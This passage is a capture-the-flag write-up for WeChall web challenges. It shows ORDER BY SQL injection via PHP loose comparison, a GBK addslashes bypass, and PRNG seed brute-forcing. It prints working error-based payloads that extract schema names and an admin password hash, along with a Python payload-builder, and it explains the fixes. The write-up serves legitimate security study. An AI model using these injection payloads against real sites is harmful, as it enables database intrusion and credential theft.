order by query (PHP). The key code:

```php
if (!in_array($orderby, $whitelist)) {
    return htmlDisplayError('Error 1010101: Not in whitelist.');
}
$orderby = $db->escape($orderby);
$query = "SELECT * FROM users ORDER BY $orderby $dir LIMIT 10";
```
There is a PHP trick here: in_array() uses loose comparison (==) by default, and the whitelist entries are integer column indices:

```php
$names = array(1 => 'Username', 3 => 'Apples', 4 => 'Bananas', 5 => 'Cherries');
$orderby = '5 and 123';
in_array($orderby, $whitelist);   // evaluates to true (1)
```

In PHP 5 and 7, comparing the integer 5 with the string '5 and 123' converts the leading numeric part of the string to a number, so '5 and 123' == 5 is true and the whitelist check passes. The value then goes into the ORDER BY clause untouched, because escape() only deals with quotes and the payload contains none. In PHP 8 an integer compared with a non-numeric string is compared as strings, so this particular bypass no longer works; the robust fix is in_array($orderby, $whitelist, true) or looking the index up in a fixed map of column names.
Summary of ORDER BY injection: http://www.jinglingshu.org/?p=10105 . Error-based injection: http://joychou.org/index.php/web/SQL-Injections-in-MySQL-LIMIT-clause.html
The query then returns all rows in ascending order, since ORDER BY (5 and 123) sorts by a constant expression.
Because UNION cannot be used to pull data out, only blind or error-based injection remains. A blind injection would have been possible, but given the restrictions of the challenge it is more convenient to use error-based injection and read the data directly:
```sql
3 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) --
```
A fancier alternative error-based technique, via PROCEDURE analyse() and extractvalue():

```
?by=3 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,database())),1) --
```
This reveals the database name gizmore_as2. Then the usual routine:
```
?by=3 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(select table_name from information_schema.tables where table_schema=0x67697a6d6f72655f617332))),1) --
```
0x67697a6d6f72655f617332 is the hex encoding of the database name gizmore_as2; writing it as a hex literal avoids single quotes, which escape() would mangle. This yields the table name users.
```
?by=3 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(select column_name from information_schema.columns where table_schema=0x67697a6d6f72655f617332 and table_name=0x7573657273 limit 1,1))),1) --
```
The column name is password. Finally, the username and password:
```
http://www.wechall.net/challenge/order_by_query/index.php?by=3 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(select concat(username,0x3a,password) from users limit 2,1))),1) --
```

```
GDO Error(1105): XPATH syntax error: ':Admin:3C3CBEB0C8ADC66F2922C65E7'
```

Note that MySQL truncates the text echoed in an XPATH syntax error to 32 characters: ':Admin:' takes 7 of them, so only the first 25 characters of the password hash appear here. A longer value has to be read in pieces with substr().
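The extraction above is repetitive by hand: hex-encode a name, wrap it in the PROCEDURE analyse()/extractvalue() template, read the value back out of the error text, and page with substr() when the 32-character limit cuts it off. The following helper, added here as an example and not code from the original write-up, does those steps offline. The error message in the demo is the one quoted on the page; the other response strings, the `column` default of 3 and the offsets are constructed for illustration, and nothing here talks to the network.

```python
"""Helpers for the error-based ORDER BY extraction shown on this page.

Added example, not code from the original write-up. Builds the
PROCEDURE analyse()/extractvalue() payload with hex literals instead of
quoted strings and pulls the leaked value back out of the XPATH error
message. Sample responses are constructed; no network access.
"""
import re
from typing import Optional

# MySQL truncates the text it echoes in "XPATH syntax error" to 32 characters.
XPATH_LIMIT = 32

# The quoted text in the error message, e.g. ':Admin:3C3C...'
_LEAK_RE = re.compile(r"XPATH syntax error: '([^']*)'")


def hex_literal(s: str) -> str:
    """Encode a string as a MySQL 0x... literal so the payload needs no quotes."""
    return "0x" + s.encode().hex()


def build_payload(expr: str, column: int = 3) -> str:
    """ORDER BY payload: a whitelisted column index, then PROCEDURE analyse().

    extractvalue() is given a string that is not valid XPath, so MySQL raises
    an error whose text contains the value of `expr`. The 0x3a (':') marker
    makes sure the text starts with a non-XPath character and shows where the
    leaked value begins. The trailing "-- " comments out whatever the
    application appends after the ORDER BY expression.
    """
    return (f"{column} PROCEDURE analyse(extractvalue(rand(),"
            f"concat(0x3a,({expr}))),1) -- ")


def table_name_expr(schema: str, offset: int = 0) -> str:
    """Subquery for the offset-th table name in `schema` (one row per error)."""
    return (f"select table_name from information_schema.tables "
            f"where table_schema={hex_literal(schema)} limit {offset},1")


def column_name_expr(schema: str, table: str, offset: int = 0) -> str:
    """Subquery for the offset-th column name of `schema`.`table`."""
    return (f"select column_name from information_schema.columns "
            f"where table_schema={hex_literal(schema)} "
            f"and table_name={hex_literal(table)} limit {offset},1")


def substr_expr(expr: str, start: int) -> str:
    """Page through a value longer than 31 characters.

    The ':' marker uses one of the 32 echoed characters, so each page carries
    at most 31 characters of the real value. `start` is 1-based, as in MySQL.
    """
    return f"substr(({expr}),{start},{XPATH_LIMIT - 1})"


def parse_leak(response: str) -> Optional[str]:
    """Return the leaked value from an error response, or None if no error."""
    m = _LEAK_RE.search(response)
    if not m:
        return None
    text = m.group(1)
    return text[1:] if text.startswith(":") else text


def is_truncated(response: str) -> bool:
    """True when the echoed text hit the 32-character limit, i.e. more remains."""
    m = _LEAK_RE.search(response)
    return bool(m) and len(m.group(1)) >= XPATH_LIMIT


if __name__ == "__main__":
    # Error message quoted on the page for the final payload.
    page_error = ("GDO Error(1105): XPATH syntax error: "
                  "':Admin:3C3CBEB0C8ADC66F2922C65E7'")
    print(build_payload(table_name_expr("gizmore_as2")))
    print(parse_leak(page_error))        # Admin:3C3CBEB0C8ADC66F2922C65E7
    print(is_truncated(page_error))      # True: the hash was cut off at 32 chars
    # Second page of the same value, to read the rest of the hash.
    creds = "select concat(username,0x3a,password) from users limit 2,1"
    print(build_payload(substr_expr(creds, XPATH_LIMIT)))
```

Feed each payload to the `by` parameter, pass the response body to parse_leak(), and while is_truncated() is true move `start` forward by 31 with substr_expr().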
basic rewrite (HTTP). The challenge simply asks you to set up your own web server; I used Docker. A later challenge needs big-integer addition, so the image ends up like this. Dockerfile:

```dockerfile
FROM phpfpm:with_mysql
RUN pear channel-discover phpseclib.sourceforge.net \
    && pear install phpseclib/Math_BigInteger
CMD ["php-fpm"]
```
docker-compose.yml:

```yaml
phpfpm_db:
  build: ./web
  volumes:
    - ./web/webcode:/webcode
nginx_server:
  image: nginx:1.8
  links:
    - phpfpm_db:phpfpm_db
  volumes:
    - ./server/conf/default_server.conf:/etc/nginx/conf.d/default.conf
    - ./server/logs:/var/log/nginx
  volumes_from:
    - phpfpm_db
  ports:
    - "8088:80"
```
Write a script that makes WeChall visit the server:

```python
import requests

session = requests.Session()


def go():
    # Tell WeChall which port our server listens on and ask it to check.
    post_data = {'port': '8088', 'go': 'I have set it up. Please check my server.'}
    # url = "http://www.wechall.net/challenge/training/www/basic/index.php"
    url = "http://www.wechall.net/challenge/training/www/rewrite/index.php"
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.5",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0",
        "Cookie": "WC=********",  # your own WeChall session cookie
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Connection": "keep-alive",
    }
    response = session.post(url, headers=headers, data=post_data)
    print(response.text)


if __name__ == '__main__':
    go()
```
reset to time (PHP). This can be compared with the random challenge from 0CTF 2016, which is harder; see http://www.mscs.dal.ca/~selinger/random/ . This challenge seeds the PRNG with the current time, so we only need to brute-force the seed. The code:

```php
<?php
// Same generator as the challenge: $len characters drawn from $alpha with rand().
function ttr_random($len, $alpha = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
{
    $alphalen = strlen($alpha) - 1;
    $key = '';
    for ($i = 0; $i < $len; $i++) {
        $key .= $alpha[rand(0, $alphalen)];
    }
    return $key;
}

$csrf = "leqJygumb3PCOytrRRd4hUaGoQEcRhk2";  // CSRF token observed on the page
$time = time() - 500;                          // start the search 500 s in the past
$tmp = "";
$i = 0;
// Try every second in a 1000-second window as the seed until the generator
// reproduces the observed token.
for ($i = 0; $i < 1000; $i++) {
    srand($time + $i);
    $tmp = ttr_random(32);
    if ($tmp == $csrf) break;
}
echo $tmp . "\n";
echo $i . "\n";
// The PRNG state continues from the recovered seed, so the next 16-char
// token the server generates is predictable.
$token = ttr_random(16);
print $token . "\n";
$res = "qJmSkxxx9rMZXO2I";  // token to verify against
print $token == $res;
?>
```
Once the seed is recovered, the verification token generated afterwards follows directly. rand() must behave exactly as it does on the target, though: PHP 7.1 made rand() an alias of mt_rand(), and before that it wrapped the platform's libc rand(), so run the brute force on a matching PHP version and platform.
addslashes. `%bf%27` bypasses the addslashes() function: with a multibyte connection charset such as GBK, the backslash (0x5c) that addslashes() inserts before the quote combines with the preceding 0xbf into a single two-byte character, so the quote survives unescaped. `0x41646d696e` is the hex literal for 'Admin', which avoids needing any further quotes in the payload.
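To see the bypass mechanically, here is a byte-level model of addslashes() and of what the server sees after decoding with the connection charset. This is an added example, not code from the original page; the byte strings are constructed here, and the charset names are Python codec names.

```python
"""Why %bf%27 gets past addslashes() (added example, not from the original page).

addslashes() works byte by byte and knows nothing about the connection
charset. Under a multibyte charset such as GBK the backslash it inserts
(0x5c) is a valid trail byte, so the server reads 0xbf 0x5c as one character
and the following quote is left unescaped. All byte strings are constructed.
"""


def addslashes(data: bytes) -> bytes:
    """Byte-level model of PHP's addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def server_view(escaped: bytes, charset: str) -> str:
    """The text MySQL sees after decoding the escaped bytes with `charset`."""
    return escaped.decode(charset)


def quote_is_escaped(payload: bytes, charset: str) -> bool:
    """Is the last quote still protected by a backslash once decoded as `charset`?

    False means the quote terminates the SQL string literal: injection.
    """
    view = server_view(addslashes(payload), charset)
    i = view.rfind("'")
    return i > 0 and view[i - 1] == "\\"


def hex_literal(s: str) -> str:
    """0x... literal, the page's way of writing 'Admin' without quotes."""
    return "0x" + s.encode().hex()


if __name__ == "__main__":
    payload = b"\xbf'"                          # what %bf%27 decodes to
    escaped = addslashes(payload)               # bf 5c 27
    print(escaped.hex())                        # bf5c27
    print(server_view(escaped, "gbk"))          # 縗'  (bf5c is one GBK character)
    print(quote_is_escaped(payload, "gbk"))     # False: the quote is live
    print(quote_is_escaped(payload, "latin-1")) # True: single-byte charset, no bypass
    print(hex_literal("Admin"))                 # 0x41646d696e
```

The fix is charset-aware escaping (mysqli_real_escape_string() after mysqli_set_charset()) or, better, prepared statements; addslashes() is never a SQL escaping function.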
are you serial. A simple deserialization problem; the following script generates the serialized object:

```php
<?php
require_once('serial_user.php');
require_once('serial_solution.php');

$username = "admin";
$password = "admin";
$userlevel = 1;

$user = new SERIAL_User($username, $password, $userlevel);
$serial_user = serialize($user);

$solution = new SERIAL_Solution();
$serial_solution = serialize($solution);
echo $serial_solution;
?>
```
net ports. curl has an interesting option for this: just add `--local-port 42` so the request is sent from source port 42 (binding a port below 1024 requires root or CAP_NET_BIND_SERVICE on Unix-like systems):

```shell
curl 'http://www.wechall.net/challenge/training/net/ports/index.php' --local-port 42 \
  -H 'Accept-Encoding: gzip, deflate, sdch' \
  -H 'Accept-Language: zh-CN,zh;q=0.8' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
  -H 'Referer: http://www.wechall.net/challs/HTTP/by/chall_score/ASC/page-1' \
  -H 'Cookie: WC=***' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: max-age=0' --compressed
```